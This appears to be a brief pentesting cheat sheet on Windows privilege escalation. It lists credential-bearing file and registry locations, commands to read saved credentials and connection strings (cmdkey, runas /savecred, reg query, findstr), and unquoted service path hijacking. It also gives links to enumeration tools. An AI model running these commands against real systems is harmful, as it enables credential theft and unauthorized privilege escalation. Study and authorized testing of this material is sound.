Privilege Escalation

Windows Privilege Escalation methods

Harvest credentials from unattended intallation

• C:\Unattend.xml

• C:\Windows\Panther\Unattend.xml

• C:\Windows\Panther\Unattend\Unattend.xml

• C:\Windows\system32\sysprep.inf

• C:\Windows\system32\sysprep\sysprep.xml

Check Powershell History

cmd.exe %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Saved Windows Credentials

cmdkey /list

runas /savecred /user:admin cmd.exe

Database credentials from IIS settings

type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString

Putty Credentials

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s

Scheduled Tasks

Manipulate binary or task to have it run as privileged user

Windows Services

Services stored in HKLM\SYSTEM\CurrentControlSet\Services\

Unquoted binary path exploitation Example: BINARY_PATH_NAME: C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe

• If we add a C:\MyPrograms\Disk.exe binary, it will be started as a service

Linux SUID Info: https://gtfobins.github.io/gtfobins/python/#suid

Tools

• https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS

• https://github.com/itm4n/PrivescCheck

• https://github.com/bitsadmin/wesng